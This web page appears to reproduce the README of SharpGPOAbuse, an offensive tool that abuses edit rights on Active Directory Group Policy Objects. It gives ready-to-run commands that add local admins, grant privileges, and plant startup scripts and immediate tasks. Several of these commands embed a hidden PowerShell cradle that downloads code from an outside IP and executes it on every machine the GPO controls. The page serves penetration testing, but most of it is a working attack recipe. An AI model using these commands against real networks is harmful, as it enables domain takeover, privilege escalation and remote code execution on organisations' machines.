SharpGPOAbuse : Tool To Take Advantage Of A User’s Edit Rights On A Group Policy Object (GPO)

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.

Usage

Usage: SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attacks Types

Currently SharpGPOAbuse supports the following options:

OptionDescription
–AddUserRightsAdd rights to a user
–AddLocalAdminAdd a user to the local admins group
–AddComputerScriptAdd a new computer startup script
–AddUserScriptConfigure a user logon script
–AddComputerTaskConfigure a computer immediate task
–AddUserTaskAdd an immediate task to a user

Attack Options

  • Adding User Rights

Options required to add new user rights:
–UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
–UserAccount
Set the account to add the new rights.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddUserRights –UserRights “SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight” –UserAccount bob.smith –GPOName “Vulnerable GPO”

  • Adding a Local Admin

Options required to add a new local admin:
–UserAccount
Set the name of the account to be added in local admins.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddLocalAdmin –UserAccount bob.smith –GPOName “Vulnerable GPO”

  • Configuring a User or Computer Logon Script

Options required to add a new user or computer startup script:
–ScriptName
Set the name of the new startup script.
–ScriptContents
Set the contents of the new startup script.
–GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “if %username%== powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

  • Configuring a Computer or User Immediate Task

Options required to add a new computer or user immediate task:

–TaskName
Set the name of the new computer task.
–Author
Set the author of the new task (use a DA account).
–Command
Command to execute.
–Arguments
Arguments passed to the command.
–GPOName
The name of the vulnerable GPO.

Additional User Task Options:

–FilterEnabled
Enable Target Filtering for user immediate tasks.
–TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format \
–TargetUserSID
The targeted user’s SID.

Additional Computer Task Options:
–FilterEnabled
Enable Target Filtering for computer immediate tasks.
–TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO” –FilterEnabled –TargetDnsName target.domain.com

Additional Options

OptionDescription
–DomainControllerSet the target domain controller
–DomainSet the target domain
–ForceOverwrite existing files if required
Download
R K

Share
Published by
R K
Tags: GPOSharpGPOAbuse
5 years ago

Recent Posts

Install Gitea Ubuntu: Complete Setup Guide for Developers

Managing source code efficiently is essential for modern software development, and Install Gitea Ubuntu is…

4 hours ago

Install Ruby Ubuntu – 3 Easy Ways to Set Up Ruby on Ubuntu 20.04

Ruby remains one of the most popular programming languages for web development, automation, and software…

5 hours ago

Plex Media Server Setup: Install and Configure on Ubuntu 20.04

A Plex Media Server Setup on Ubuntu 20.04 is one of the easiest ways to…

6 hours ago

Why Deploying AI Is Just the Beginning: The Case for Ongoing AI Operations Monitoring

Most enterprise AI programs treat deployment as the destination. The business case is built around…

1 day ago

Bash Scripting Best Practices Every Beginner Should Know

Introduction Bash scripting is a powerful way to automate Linux tasks, but writing a script…

6 days ago

How To Create A Self-Signed SSL Certificate Using Bash And OpenSSL

Introduction A self-signed SSL certificate is a certificate that is created and signed by the…

6 days ago